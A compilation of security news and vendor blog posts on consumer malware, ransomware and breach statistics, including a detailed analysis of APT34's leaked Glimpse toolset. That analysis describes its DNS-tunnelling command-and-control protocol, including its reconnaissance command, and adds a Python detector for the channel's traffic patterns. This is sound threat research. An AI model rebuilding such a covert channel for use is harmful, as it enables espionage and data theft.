If you don’t have an Android smart TV, then you’ve no other choice but to use the in-built browser. Now, if you do have a choice and really don’t like the default one, you should stick with the usual ‘suspects’ like Chrome, Mozilla Firefox, Opera, or Brave. Why? Because they’re much more secure compared to generic ones.

So, can a smart TV get a virus? That would be a “yes”. Still, take this with a grain of salt: sure, malware can brick your TV, but it’s still not nearly as dramatic as what would happen if the same bug got into your computer.

As always, keep your apps up to date, perform regular scans, avoid dubious memory sticks, and stick with the big brands. For any question, comments, rants, or suggestions, feel free to shoot me a comment. Cheers!

The post Can a Smart TV Get a Virus? appeared first on Heimdal Security Blog.

Briton who helped stop 2017 WannaCry virus spared jail over malware charges

  • Marcus Hutchins pleaded guilty to two malware charges
  • 25-year-old ‘incredibly thankful’ to be sentenced to time served

The British computer expert who helped shut down the WannaCry cyberattack on the NHS said he is “incredibly thankful” after being spared jail in the US for creating malware.

Marcus Hutchins was hailed as a hero in May 2017 when he found a “kill switch” that slowed the effects of the WannaCry virus affecting more than 300,000 computers in 150 countries.


Is Your WhatsApp Being Weird? You May Need to Check For Hidden Malware

With over 2.5 billion monthly active users accumulated since its inception, Android has seen massive growth over the last 10 years. With so many users, it’s no wonder cybercriminals continuously look to exploit Android devices. In fact, 25 million Android users have recently been hit with a new malware.

Dubbed Agent Smith, this cyberthreat sneaks onto a user’s device when the user downloads a malicious app from the app store, like a photo utility or game app. The app then silently installs the malware disguised as a legitimate Google updating tool. However, no updating icon appears on the screen, making the user oblivious to their device being in danger. Once installed, the malware replaces legitimate apps on the user’s phone, such as WhatsApp, with an evil update that serves bad ads. According to security researchers, the ads themselves aren’t malicious. But if a victim accidentally clicks on the ad, the hackers can make money from these ad fraud schemes. What’s more, there’s potential that these bad ads aren’t limited to just WhatsApp and could be found on other platforms as well.

So, what can Android users do to prevent this malware from sneaking onto their device? Check out the following tips to help stay secure:

  • Be wary of WhatsApp ads. Android users should take action if they experience advertisements displayed at strange times, such as when they open WhatsApp. The legitimate WhatsApp does not serve ads, so if you experience ads on this platform your device might have been infected.
  • Look out for suspicious apps. Check the apps and notifications section of your Android settings. If you see suspicious apps with names such as Google Updater, Google Installer for U, Google Powers, and Google Installer, uninstall these apps right away.
  • Stay away from unofficial Android stores. Google has extra precautions designed to prevent malware from getting onto the official Android store website, so only downloading apps from there could help protect you.
  • Use a security solution. A solution like McAfee Mobile Security can help Android users stay protected from threats like mobile malware. It also provides a free antivirus cleaner and phone security app to protect your online privacy and enhance device performance.

And, as always, to stay updated on all of the latest consumer and mobile security threats, follow @McAfee_Home  on Twitter, listen to our podcast Hackable?, and ‘Like’ us on Facebook.

The post Is Your WhatsApp Being Weird? You May Need to Check For Hidden Malware appeared first on McAfee Blogs.

How do I remove malware from my Windows laptop?

Don’s laptop is infected with malware and he’d like a clean machine. What’s the best way?

What’s the cheapest way to get my Windows laptop swept and cleaned out of malware etc? Don

There are two obvious ways to clean a Windows laptop, and both of them are free. The first is to run a number of anti-malware programs to find and remove the bad stuff. The second is to reset it to factory condition.


Hacked forensic firm pays ransom after malware attack

Largest private provider Eurofins hands over undisclosed fee to regain control of systems

Britain’s largest private forensics provider has paid a ransom to hackers after its IT systems were brought to a standstill by a cyber-attack, it has been reported.

Eurofins, which is thought to carry out about half of all private forensic analysis, was targeted in a ransomware attack on 2 June, which the company described at the time as “highly sophisticated”. Three weeks later the company said its operations were “returning to normal”, but did not disclose whether or not a ransom had been paid.


Ransomware As A Tool – LockerGoga

Ransomware authors keep experimenting with payload development in various dimensions. In the timeline of ransomware implementations, we have seen its evolution from a simple screen locker to a multi-component model for file encryption, from a novice approach to a sophisticated one. Ransomware as a Tool has evolved in the wild…

How Chinese spy app allows officials to harvest personal data

Intrusive software collects emails and texts and could be used to track movement

The tourists travelling into China were never supposed to know their phones had been compromised.

The surveillance app being installed on their devices should have been removed by the border officers tasked with the job. But their apparent carelessness has provided a rare insight into the techniques used by China to snoop on visitors and the kind of information being harvested from their phones.


Kids Obsessed with YouTube? How to Help Them Stay Balanced, Safe This Summer

If you haven’t seen your kids in a few hours but can hear outbursts of laughter from a nearby room, chances are, they — along with millions of other kids — are watching YouTube. The popular digital video hub has more viewers than network television and soaks up more than 46,000 years of our collective viewing time annually. Chances are your kids will be part of the YouTube digital mosh pit this summer, but do you know the risks?

Types of screen time

The quality of online time for kids usually shifts during the summer months. For example, there’s active screen time and passive screen time. Knowing the difference between the two can help your family decide best how to balance device use — especially when it comes to consuming endless hours on YouTube.

Active screen time requires a person’s cognitive and/or physical engagement and develops social, language, or physical skills. Engaging in activities such as researching, creating original content, learning a new program, and playing educational games is considered active screen usage. Active screen time tends to go up during the school year and down in the summer.

Passive screen time is passively absorbing information via a screen, app, or game for entertainment reasons only. This includes scrolling through social networks, watching movies (binge watching), and watching YouTube videos. Little to no thought or creativity is required when a person engages in repetitious, passive screen activities.

According to a Common Sense Media study, children ages 8 to 12, spend nearly six hours per day using media, and teenagers average closer to nine hours a day (numbers don’t include school work). It’s safe to say that during the summer, these numbers climb even higher — as do the risks.

Here are a few ways to balance screen time and boost safety on YouTube this summer.

YouTube: 5 Family Talking Points

  • Explore YouTube. The best way to understand the culture of YouTube is to spend time there. Ask your kids about their favorite channels and what they like about them. Get to know the people they follow — after all, these are the people influencing your child. Here’s a sampling of a few top YouTubers: MattyBRaps (music), JoJoSiwa (music, dance), Brooklyn and Bailey (vlogs, challenges, music), Baby Ariel (challenges, vlog), Johnny Orlando (music), PewDiePie (comedy), Jacy and Kacy (crafts, challenges), Bethany Mota (shopping hauls), Grav3yardgirl (makeup), Smosh (comedy).
  • Respect age limits. YouTube is packed with humor, tutorials, pranks, vlogs, music, reviews, and endlessly engaging content. However, age limits exist for a good reason: the channel also has its share of dangerous content. The darker side of YouTube is always just a click away and includes sexual content, hate content, harassment and cyberbullying, violent and graphic content, and scams.
  • Turn on restricted mode. By turning on the restricted mode you can block videos with mature content from a user’s searches, related videos, playlists, and shows — this is a big deal since many “up next” videos (on the right side of the screen) are cued to play automatically and can lead kids to sketchy content. In addition to the restricted mode, consider an extra layer of protection with filtering software for all your family devices.
  • Opt for YouTube Kids. For kids under 13, YouTube Kids is a safe video platform, specially curated for young viewers. Kids may snub any platform designed “for kids,” however, if you are worried about younger kids running into inappropriate content, this is your best video option.
  • Discuss the ‘why’ behind the rules. As a parent, you know the possible ways YouTube — or other social platforms — can be harmful. Don’t assume your kids do. Kids are immersed in their peer groups online, which means danger and harm aren’t primary concerns. Even so, before you lecture kids about the dangers of YouTube, open up a dialogue around the topic by asking great questions. Here are just a few to get you started:

  • Do you understand why it’s important to filter YouTube content and respect age limits (inappropriate content, cyberbullying)?
  • Do you understand why unboxing and makeup videos are so popular (advertisers want you to purchase)?
  • Do you understand why we need to balance screen time this summer (mental and physical health)?
  • Do you know why this piece of content might be fake or contain questionable information (conspiracy, hate, or political videos)?

As the public increasingly demands social networks do more to remove harmful or objectionable content, one thing is clear: Despite strides in this area by a majority of platforms, no online social hub is (or will likely ever be) 100% safe. The best way to keep kids safe online is by nurturing a strong parent-child connection and having consistent conversations designed to equip and educate kids about digital risks and responsibility.

The post Kids Obsessed with YouTube? How to Help Them Stay Balanced, Safe This Summer appeared first on McAfee Blogs.

Beware! Email attachments can make you victim of spear phishing attacks

In the last few months, we’ve seen a sudden increase in Spear Phishing attacks. Spear phishing is a variation of a phishing scam wherein hackers send a targeted email to an individual which appears to be from a trusted source. In this type of attack, the attacker uses social engineering tricks and some…

Process Reimaging: A Cybercrook’s New Disguise for Malware

As of early 2019, Windows 10 is running on more than 700 million devices, including PCs, tablets, phones, and even some gaming consoles. However, it turns out the widespread Windows operating system has some inconsistencies as to how it specifically determines process image file locations on disk. Our McAfee Advanced Threat Research team decided to analyze these inconsistencies and as a result uncovered a new cyberthreat called process reimaging. Similar to process doppelganging and process hollowing, this technique evades security measures, but with greater ease since it doesn’t require code injection. Specifically, this technique affects the ability for a Windows endpoint security solution to detect whether a process executing on the system is malicious or benign, allowing a cybercrook to go about their business on the device undetected.

Let’s dive into the details of this threat. Process reimaging leverages built-in Windows APIs, or application programming interfaces, which allow applications and the operating system to communicate with one another. One API, K32GetProcessImageFileName, allows endpoint security solutions, like Windows Defender, to verify whether the EXE file associated with a process contains malicious code. However, with process reimaging, a cybercriminal could subvert the security solution’s trust in the Windows operating system APIs so that they display inconsistent FILE_OBJECT names and paths. Consequently, Windows Defender misunderstands which file name or path it is looking at and can no longer tell whether a process is trustworthy. By using this technique, cybercriminals can keep malicious processes executing on a user’s device without the user knowing it.

So, the next question is — what can Windows users do to protect themselves from this potential threat? Check out these insights to help keep your device secure:

  • Update your software. Microsoft has issued a partial fix that stops cybercriminals from exploiting file names to disguise malicious code, which helps address at least part of the issue for Windows Defender only. And while file paths are still viable for exploitation, it’s worth updating your software regularly to ensure you always have the latest security patches, as this is a solid practice to work into your cybersecurity routine.
  • Work with your endpoint security vendor. To help ensure you’re protected from this threat, contact your endpoint security provider to see if they protect against process reimaging.


The post Process Reimaging: A Cybercrook’s New Disguise for Malware appeared first on McAfee Blogs.

Bargain or Bogus Booking? Learn How to Securely Plan Summer Travel

With summertime just around the corner, families are eagerly looking to book their next getaway. Since vacation is so top-of-mind during the summer months, users are bound to come across websites offering cheap deals on flights, accommodations, and other experiences and activities. With so many websites claiming to offer these “can’t-miss deals,” how do you know who to trust?

It turns out that this is a common concern among folks looking for a little summer getaway. According to our recent survey of 8,000 people across the UK, US, Canada, Australia, France, Germany, Spain, and Singapore, 54% of respondents worry about their identity being stolen while booking and purchasing travel and accommodation online. However, 27% don’t check the authenticity of a website before booking their vacation online. Over half of these respondents say that it doesn’t cross their minds to do so.

These so-called “great deals” can be difficult to pass up. Unfortunately, 30% of respondents have been defrauded thanks to holiday travel deals that were just too good to be true. What’s more, 46.3% of these victims didn’t realize they had been ripped off until they arrived at their holiday rental to find that the booking wasn’t actually valid.

In addition to avoiding bogus bookings, users should also refrain from risky online behavior while enjoying their summer holidays. According to our survey, 44.5% of respondents are putting themselves at risk while traveling by not checking the security of their internet connection or willingly connecting to an unsecured network. 61% also stated that they never use a VPN, while 22% don’t know what a VPN is.

Unfortunately, travel-related attacks aren’t limited to just travelers either; hotels are popular targets for cybercriminals. According to analysis conducted by the McAfee Advanced Threat Research team, the most popular attack vectors are POS malware and account hijacking. Due to these attacks, eager vacationers have had their customer payment, credit card data, and personally identifiable information stolen. In order for users to enjoy a worry-free vacation this summer, it’s important that they are aware of the potential cyberthreats involved when booking their trips online and what they can do to prevent them.

We here at McAfee are working to help inform users of the risks they face when booking through unsecured or unreliable websites as well as when they’re enjoying some summertime R&R. Check out the following tips so you can enjoy your vacation without questioning the status of your cybersecurity:

  • Always connect with caution. If you need to conduct transactions on a public Wi-Fi connection, use a virtual private network (VPN) to help keep your connection secure.
  • Think before you click. Oftentimes, cybercriminals use phishing emails or fake sites to lure consumers into clicking links for products or services that could lead to malware. If you receive an email asking you to click on a link with a suspicious URL, it’s best to avoid interacting with the message altogether.
  • Browse with security protection. Use a comprehensive security solution, like McAfee Total Protection, which includes McAfee WebAdvisor that can help identify malicious websites.
  • Utilize an identity theft solution. With all this personal data floating around online, it’s important to stay aware of any attempts to steal your identity. Use an identity theft solution, such as McAfee Identity Theft Protection, that can help protect personally identifiable information from identity theft and fraud.


The post Bargain or Bogus Booking? Learn How to Securely Plan Summer Travel appeared first on McAfee Blogs.

The Guardian view on cybercrime: the law must be enforced | Editorial

Governments and police must take crime on the internet seriously. It is where we all live now

About half of all property crime in the developed world now takes place online. When so much of our lives, and almost all of our money, have been digitised, this is not surprising – but it has some surprising consequences. For one thing, the decline in reported property crimes trumpeted by successive British governments between 2005 and 2015 turns out to have been an illusion. Because banks were not required to report fraud to the police after 2005, they often didn’t. It would have made both banks and police look bad to have all that crime known and nothing done about it. The cost of the resulting ignorance was paid by the rest of government, and by the public, too, deprived of accurate and reliable knowledge. Since then, the total number of property crimes reported has risen from about 6m to 11m a year as the figures have taken computerised crime into account.

The indirect costs to society are very much higher than the hundreds of millions that individuals lose. One example is the proliferation of plagiarism software online, which developed an entire industry in poor, English-speaking countries like Kenya, serving idle or ignorant students in England and North America. The effort required by schools and universities to guard against such fraud has been considerable, and its cost entirely disproportionate to the gains made by the perpetrators.


3 Tips for Protecting Against the New WhatsApp Bug

Messaging apps are a common form of digital communication these days, with Facebook’s WhatsApp being one of the most popular options out there. The communication platform boasts over 1.5 billion users – who now need to immediately update the app due to a new security threat. In fact, WhatsApp just announced a recently discovered security vulnerability that exposes both iOS and Android devices to malicious spyware.

So, how does this cyberthreat work, exactly? Leveraging the new WhatsApp bug, hackers first begin the scheme by calling an innocent user via the app. Regardless of whether the user picks up or not, the attacker can use that phone call to infect the device with malicious spyware. From there, crooks can potentially snoop around the user’s device, likely without the victim’s knowledge.

Fortunately, WhatsApp has already issued a patch that solves for the problem – which means users will fix the bug if they update their app immediately. But that doesn’t mean users shouldn’t still keep security top of mind now and in the future when it comes to messaging apps and the crucial data they contain. With that said, here are a few security steps to follow:

  • Flip on automatic updates. No matter the type of application or platform, it’s always crucial to keep your software up-to-date, as fixes for vulnerabilities are usually included in each new version. Turning on automatic updates will ensure that you are always equipped with the latest security patches.
  • Be selective about what information you share. When chatting with fellow users on WhatsApp and other messaging platforms, it’s important you’re always careful of sharing personal data. Never exchange financial information or crucial personal details over the app, as they can possibly be stolen in the chance your device does become compromised with spyware or other malware.
  • Protect your mobile phones from spyware. To help prevent your device from becoming compromised by malicious software, such as this WhatsApp spyware, be sure to add an extra layer of security to it by leveraging a mobile security solution. With McAfee Mobile Security being available for both iOS and Android, devices of all types will remain protected from cyberthreats.


The post 3 Tips for Protecting Against the New WhatsApp Bug appeared first on McAfee Blogs.

2019 Verizon Data Breach Investigations Report (DBIR) Key Takeaways

The 2019 Verizon Data Breach Investigations Report (DBIR) was released today, and I was lucky enough to be handed a hot-off-the-press physical copy while at the Global Cyber Alliance Cyber Trends 2019 event at Mansion House, London. For me, the DBIR provides the most insightful view on the evolving threat landscape, and is the most valuable annual “state of the nation” report in the security industry.

Global Cyber Alliance Cyber Trends 2019

The DBIR has evolved since its initial release in 2008, when it focused on payment card data breaches and Verizon’s own breach investigations data. This year’s DBIR involved the analysis of 41,686 security incidents from 66 global data sources in addition to Verizon. The analysed findings are expertly presented over 77 pages, using simple charts supported by astute ‘plain English’ explanations, which is why the DBIR is one of the most quoted reports in presentations and within industry sales collateral.

DBIR 2019 Key Takeaways

  • Financial gain remains the most common motivation behind data breaches (71%)
  • 43% of breaches occurred at small businesses
  • A third (32%) of breaches involved phishing
  • The nation-state threat is increasing, with 23% of breaches by nation-state actors
  • More than half (56%) of data breaches took months or longer to discover
  • Ransomware remains a major threat, and is the second most common type of malware reported
  • Business executives are increasingly targeted with social engineering attacks such as phishing/BEC
  • Crypto-mining malware accounts for less than 5% of data breaches; despite the publicity, it didn’t make the top ten malware listed in the report
  • Espionage is a key motivation behind a quarter of data breaches
  • 60 million records breached due to misconfigured cloud service buckets
  • Continued reduction in payment card point of sale breaches
  • The hacktivist threat remains low; the increase in hacktivist attacks reported in the DBIR 2012 report appears to be a one-off spike

This Week in Security News: BEC Attacks and Botnet Malware

Welcome to our weekly roundup, where we share what you need to know about the cybersecurity news and events that happened over the past few days. This week, learn about the prevalence and impact of BEC attacks. Also, find out how botnet malware can perform remote code execution, DDoS attacks and cryptocurrency mining.

Read on:

Tech Support Scam Employs New Trick by Using Iframe to Freeze Browsers

Trend Micro discovered a new technical support scam (TSS) campaign that makes use of iframe in combination with basic pop-up authentication to freeze a user’s browser. 

Cybersecurity Pros Could Work for Multiple Agencies Under Bill Passed by Senate

Skilled federal cybersecurity workers could be rotated among civilian agencies under bipartisan legislation the Senate passed to help fill specific gaps in the workforce. 

New Cybersecurity Report Warns CIOs — ‘If You’re Breached Or Hacked, It’s Your Own Fault’

A new cybersecurity survey conducted by endpoint management specialists 1E and technology market researchers Vanson Bourne questioned 600 IT operations and IT security decision-makers across the U.S. and U.K., and found that 60% of the organizations had been breached in the last two years and 31% had been breached more than once.

AESDDoS Botnet Malware Exploits CVE-2019-3396 to Perform Remote Code Execution, DDoS Attacks, and Cryptocurrency Mining

Trend Micro’s honeypot sensors detected an AESDDoS botnet malware variant exploiting a server-side template injection vulnerability in a collaboration software program used by DevOps professionals. 

U.K. Prime Minister Theresa May Fires Defense Secretary Gavin Williamson Over Huawei Leak

British Prime Minister Theresa May fired Defense Secretary Gavin Williamson, saying he leaked sensitive information surrounding a review into the use of equipment from China’s Huawei Technologies Co. in the U.K.’s telecoms network. 

This Hacker Is Selling Dangerous Windows 0-Day Hacks For Past 3 Years

A report by ZDNet has revealed that a mysterious hacker has been selling Windows zero-day exploits to the world’s most notorious cybercrime groups for the past three years. At least three cyber-espionage groups, also known as Advanced Persistent Threats (APTs), are regular customers of this hacker.

Docker Hub Repository Suffers Data Breach, 190,000 Users Potentially Affected

In an email sent to their customers on April 26, Docker reported that the online repository of their popular container platform suffered a data breach that affected 190,000 users. 

IC3: BEC Cost Organizations US$1.2 Billion in 2018

In the recently published 2018 Internet Crime Report by the FBI’s Internet Crime Complaint Center (IC3), the agency states that in 2018 alone, it received 20,373 BEC/email account compromise (EAC) complaints that racked up a total of over US$1.2 billion in adjusted losses. 

Trend Forward Capital’s First Startup Pitch Competition in Dallas

Trend Forward Capital, in a partnership with Veem, is bringing its Forward Thinker Award and pitch competition to Dallas on May 20. 

BEC Scammers Steal US$1.75 Million From an Ohio Church

The Saint Ambrose Catholic Parish in Brunswick, Ohio was the victim of a BEC attack when cybercriminals gained access to employee email accounts and used them to trick other members of the organization into wiring the payments into a fraudulent bank account. 

Cybersecurity Experts Share Tips And Insights For World Password Day

May 2 is World Password Day. World Password Day falls on the first Thursday in May each year and is intended to raise awareness of password best practices and the need for strong passwords. 

Confluence Vulnerability Opens Door to GandCrab

A vulnerability in a popular devops tool could leave companies with a dose of ransomware to go with their organizational agility, according to researchers at Trend Micro and Alert Logic.

Were you surprised by the amount of business email compromise complaints the FBI received in 2018? Share your thoughts in the comments below or follow me on Twitter to continue the conversation: @JonLClay.

The post This Week in Security News: BEC Attacks and Botnet Malware appeared first on .

APT34: Glimpse project

The APT34 Glimpse project is maybe the most complete APT34 project known so far, the popular researcher Marco Ramilli analyzed it for us.

Indeed, we can observe a file-based command and control structure (a quite unusual solution), a VBS launcher, a PowerShell payload and a covert channel over a DNS engine. This last feature is the best-known characteristic attributed to APT34. But let’s move on and start a quick analysis of it.

Since at least 2014, an Iranian threat group tracked by FireEye as APT34 has conducted reconnaissance aligned with the strategic interests of Iran. The group conducts operations primarily in the Middle East, targeting financial, government, energy, chemical, telecommunications and other industries. Repeated targeting of Middle Eastern financial, energy and government organisations leads FireEye to assess that those sectors are a primary concern of APT34. The use of infrastructure tied to Iranian operations, timing and alignment with the national interests of Iran also lead FireEye to assess that APT34 acts on behalf of the Iranian government. (Source: MISP Project).

On April 19 2019, researchers at Chronicle, a security company owned by Google’s parent company, Alphabet, examined the leaked tools, dumped the previous week on a Telegram channel, and confirmed that they are indeed the same ones used by the OilRig attackers. OilRig has been connected to a number of intrusions at companies and government agencies across the Middle East and Asia, including technology firms, telecom companies, and even gaming companies. Whoever is leaking the toolset has also been dumping information about the victims OilRig has targeted, as well as data identifying some of the servers the group uses in its attacks.

According to Duo, “OilRig delivered Trojans that use DNS tunneling for command and control in attacks since at least May 2016. Since May 2016, the threat group has introduced new tools using different tunneling protocols to their tool set,” Robert Falcone of Palo Alto Networks’ Unit 42 research team wrote in an analysis of the group’s activities.

Today I’d like to focus my attention on the Glimpse project since, in my personal opinion, it could be considered the “stereotype” of APT34 (with the data we’ve got so far).

The Glimpse Project

The package comes with a README file named “Read me.txt” (note the space). The name per se is quite unusual, and the content is a simple guide on how to set up a Node.js server and a Windows server that would run the “stand alone” .NET (>v4) application to control infected machines. The infection starts by propagating a .VBS script called “runner_.vbs”, which is a simple runner for a more sophisticated PowerShell payload. The PowerShell payload is a quite complex script performing several functions. The following image shows its “deobfuscated” main loop.

Glimpse Infection Payload Main Loop

The payload loops waiting for instructions; once a command comes from the C2, it performs the specific action and answers back to the C2 by requesting crafted subdomains based on the variable $aa_domain_bb. One of the most important functions the payload implements is dropping and executing additional toolsets. Indeed, this payload is mainly a delivery module with some additional controls, entirely based on a DNS covert channel.

The $aa_domain_bb variable contains the main domain name for which the C2 acts as the authoritative DNS server. While no actions are coming from the C2, the infected agent periodically “pings” the C2 with basic information about the victim machine. For example, the function aa_ping_response_bb composes an encoded DNS message (aa_text_response_bb) that sends the agent’s own last IP address. At this stage we can identify two communication channels. The first channel is the subdomain generation, while the second channel is the TXT DNS record, for example: control: 95 – ackNo: 0 – aid: 59071d8289 – action: M >>> 59071Md8200089EC36AC95T. Each of them carries different pieces of information. One of the most important functions is aa_AdrGen_bb, the communication manager. It implements the control layer used to send and receive control information such as commands, bytes received, whether the file transfer has been closed, and so on. The decoded actions are stored in the variable aa_act_bb and are the following:

Command and Control. Env creation for new connected agents
  • M. If the agent is already registered with the C2, this command acts like a ping: it updates basic information in the corresponding “agent” folder. If it is the first time the agent connects back to the C2, it starts a registration phase which, on the server side (the command and control side), builds a dedicated folder and file environment. See the previous image: Command and Control. Env creation for new connected agents.
  • W. This is a TXT request to list the waiting commands (or, if you wish, “kinds of jobs”). The first command executed after the registration phase is the one tagged 10100, whose content is “whoami&ipconfig /all”.
  • D. This is the actual command to be executed. It takes the tagged task as input and forwards the Base64-encoded content of the file to the requesting Agent.
  • 0. This is not a TXT request. It makes the authoritative DNS (the command and control) answer the agent with the requested file from the waiting folder, answering back an A record whose data field is a crafted IP. If no “actions” (files) are in the waiting folder, the C2 answers back an A record whose data field is “24.125.” + fileNameTmp.substring(0, 2) + “.” + fileNameTmp.substring(2, 5), with a time to live randomly chosen between 0 and 360.
  • 1. This is not a TXT request. It makes the authoritative DNS (the command and control) answer back with the file content. It implements a multiple-answer chain, according to RFC 4408, to send files larger than 255 characters.
  • 2. This is not a TXT request. It makes the authoritative DNS (the command and control) receive a file from the Agent. It implements a multi-part chain to reconstruct the partial chunks carried in domain name requests. After sending all of the data, the Agent issues a final DNS query with “COCTabCOCT” in the data segment. This query notifies the C2 server that the Trojan has finished sending the contents of the file.
Command and Control: COCTabCOCT end of communication

The following image shows a running example of the infection chain in a controlled virtual environment. You can see the communication layers over the requested domains: the requests carry data in the subdomain, while the answered IP gives a specific affirmative or negative response.
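As an added example, not code from the original post or from the leaked toolset, the following Python script scores passive-DNS records against the traits described above: control data carried in TXT answers, the crafted “no job waiting” A answers of the form 24.125.xx.yyy with a TTL of at most 360, and the COCTabCOCT upload-complete marker inside a query name. The log format, the domain c2-example.invalid, the hex tails and the long-label threshold are constructed assumptions for the example.

```python
"""Heuristic detector for the Glimpse DNS covert channel over passive-DNS logs.

Added example, not code from the leaked toolset.  It checks only traits the
analysis above describes: control data in TXT answers, "no job waiting"
A answers of the form 24.125.<2 chars>.<3 chars> with a TTL of 0..360,
and the COCTabCOCT upload-complete marker inside a query name.
"""
import ipaddress
import shlex
from collections import defaultdict

# Values taken from the analysis of the Glimpse payload.
NO_JOB_NETWORK = ipaddress.ip_network("24.125.0.0/16")
NO_JOB_MAX_TTL = 360
EOF_MARKER = "COCTabCOCT"
# Assumed threshold: a leftmost label this long is likely carrying data.
LONG_LABEL = 20

# Constructed log lines in an assumed "qname qtype answer ttl" format; the
# domain, the hex tails and the IP values are made up for the example.
SAMPLE_LOG = """\
59071Md8200089EC36AC95T.c2-example.invalid TXT "control: 95 - ackNo: 0 - aid: 59071d8289 - action: M" 300
59071W0000000000000000T.c2-example.invalid TXT "10100" 300
59071D10100A9F3C21E7BB8.c2-example.invalid A 24.125.10.100 217
59071D10100A9F3C21E7BB8.c2-example.invalid A 24.125.10.100 42
59071f4a7eCOCTabCOCT.c2-example.invalid A 24.125.0.0 12
www.example.com A 93.184.216.34 3600
mail.example.com A 93.184.216.34 3600
"""


def parse_line(line):
    """Split one log line into (qname, qtype, answer, ttl); quoted TXT data stays one field."""
    qname, qtype, answer, ttl = shlex.split(line)
    return qname.rstrip("."), qtype.upper(), answer, int(ttl)


def base_domain(qname):
    """Registered domain, approximated as the last two labels (assumption: no public-suffix list)."""
    return ".".join(qname.split(".")[-2:])


def is_no_job_answer(qtype, answer, ttl):
    """True for the A answer Glimpse returns when the agent's waiting folder is empty."""
    if qtype != "A":
        return False
    try:
        ip = ipaddress.ip_address(answer)
    except ValueError:
        return False
    return ip in NO_JOB_NETWORK and 0 <= ttl <= NO_JOB_MAX_TTL


def analyze(log_text):
    """Aggregate per-domain indicators and mark domains matching the Glimpse pattern."""
    stats = defaultdict(lambda: {"txt_queries": 0, "no_job_answers": 0,
                                 "eof_markers": 0, "long_labels": 0, "suspicious": False})
    for line in log_text.splitlines():
        if not line.strip():
            continue
        qname, qtype, answer, ttl = parse_line(line)
        d = stats[base_domain(qname)]
        if qtype == "TXT":
            d["txt_queries"] += 1
        if is_no_job_answer(qtype, answer, ttl):
            d["no_job_answers"] += 1
        if EOF_MARKER in qname:
            d["eof_markers"] += 1
        if len(qname.split(".")[0]) >= LONG_LABEL:
            d["long_labels"] += 1
    for d in stats.values():
        # The end-of-upload marker alone is decisive; otherwise require control traffic
        # (TXT) together with the crafted A answers, so that an ordinary host that happens
        # to live in 24.125.0.0/16 is not flagged on its own.
        d["suspicious"] = d["eof_markers"] > 0 or (d["txt_queries"] > 0 and d["no_job_answers"] > 0)
    return dict(stats)


def suspicious_domains(log_text):
    """Sorted list of domains flagged by analyze()."""
    return sorted(name for name, d in analyze(log_text).items() if d["suspicious"])


if __name__ == "__main__":
    for name, d in analyze(SAMPLE_LOG).items():
        print(name, d)
```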


Glimpse running environment

The command and control is implemented by a standalone .NET application working through files. The backend, a nodeJS server, offers public APIs and saves requests to agents and results from agents directly into files named with the “UID-IP” convention, which acts as the agent ID. The panel reads those files and implements stats and actions. The following image shows the static configuration section in the C2 panel.

Command and Control Panel Hardcoded Settings

The Control Panel is mainly composed of two .NET Window components: the Main Window, where the list of connected Agents is shown with additional information such as Agent ID, Agent IP, Agent Last Online Time and Attacker Comments; and the Control Window, which is opened once the attacker clicks on a selected Agent. The onClick event spawns the following code:

controlPanel = new controlPanel(, agent.ip, agent.lastActivity);

After its initialisation phase, the control panel enables the attacker to write or upload a list of commands, or a file containing commands, to agents. The following image shows the controlPanel function which takes commands from input “TextFields” and creates a new file containing the commands in the waiting folder. The contents of that folder will be dropped on the selected Agent and executed.

Command and Control, controlPanel insert_command function

The controlPanel offers many additional functionalities to better control single Agents or groups of Agents. Trying to date the project, we can observe the compile time, which is 9/1/2018 at 5:13:02 AM for newPanel-dbg.exe and 9/8/2018 at 8:01:54 PM for the imported library ToggleSwitch.dll.

With high probability we are facing a multi-modular attacking framework where, on one side, the DNS communication channel delivers commands to the target Agents and, on the other side, many control panels could be developed and attached to the DNS communication system. This becomes quite obvious when looking at the framework as a developer: the DNS communication channel uses files to store information and to synchronise actions and agents, so that many C2s could be adapted to use it as a communication channel. We might think that many APT34 units would be able to reuse such a communication channel. Another interesting observation comes from trying to date the framework. A PowerShell Agent was leaked on PasteBin in August 2018 (take a look here) by an anonymous user and has been seen, to date, by very few people (197 so far). The command and control used had been compiled the month before (July 2018). The development technologies (.NET, nodeJS) are very different and the implementation styles differ as well. The DNS communication channel is developed in a linear, more function-driven programming style, while the standalone command and control is developed using somewhat more sophisticated object-oriented programming with a flavour of agent-oriented programming: the attacker treats the agent object as an independent agent working without direct control. The attacker writes files as the medium to drive the Agent behaviour.

The original post was published on Marco Ramilli’s blog:

About the author: Marco Ramilli, Founder of Yoroi

I am a computer security scientist with an intensive hacking background. I do have an MD in computer engineering and a PhD in computer security from the University of Bologna. During my PhD program I worked for the US Government (at the National Institute of Standards and Technology, Security Division) where I did intensive research in malware evasion techniques and penetration testing of electronic voting systems.

I do have experience in security testing since I have been performing penetration testing on several US electronic voting systems. I’ve also been in charge of testing the uVote voting system from the Italian Ministry of Homeland Security. I met Palantir Technologies where I was introduced to the Intelligence Ecosystem. I decided to amplify my cybersecurity experiences by diving into SCADA security issues with some of the biggest industrial agglomerates in Italy. I finally decided to found Yoroi: an innovative Managed Cyber Security Service Provider developing some of the most amazing cybersecurity defence centers I’ve ever experienced! Now I technically lead Yoroi defending our customers, strongly believing in: Defence Belongs To Humans

Edited by Pierluigi Paganini

(Security Affairs – APT34, Glimpse project)

The post APT34: Glimpse project appeared first on Security Affairs.

Victims of ZQ Ransomware can decrypt their files for free

Good news for the victims of the ZQ Ransomware: security experts at Emsisoft have released a free decryptor tool.

Good news for the victims of the ZQ Ransomware: security experts at Emsisoft have released a free decryptor tool that allows them to recover their files for free.

ZQ Ransomware infected users in the US, India, Poland, Brazil and the UK.

The ZQ Ransomware encrypts victims’ files using the Salsa20 and RSA-1024 algorithms. The malware adds the extension “.[].zq” to the encrypted files.

The ransomware drops a ransom note, “{HELP__DECRYPT}.txt”, on the victims’ machines; it includes payment instructions. Victims can contact the operators behind the ransomware by sending a message to the email address “”.

Below is the text of the ransom note: “All of _our files are encr_pted* to decr_pt them write me to
Your key:

ZQ ransomware

In order to decrypt the files, victims need to provide an encrypted file together with its original, unencrypted version. The decryptor tool is available at the following link:

Below is the step-by-step procedure:

  1. IMPORTANT! Make sure you remove the malware from your system first, otherwise it will repeatedly lock your system or encrypt files.
  2. Download the free Emsisoft Decrypter for ZQ.
  3. Run the executable and confirm the license agreement when asked.
  4. Click “Start” to decrypt your files. Note that this may take a while.
  5. All done! Gotta crypt ’em all!

Emsisoft has recently released several tools to help victims of other ransomware families, including the CryptoPokemon ransomware, the Planetary ransomware, the Hacked ransomware and the PewDiePie ransomware.

Pierluigi Paganini

(SecurityAffairs – ransomware, decryptor)

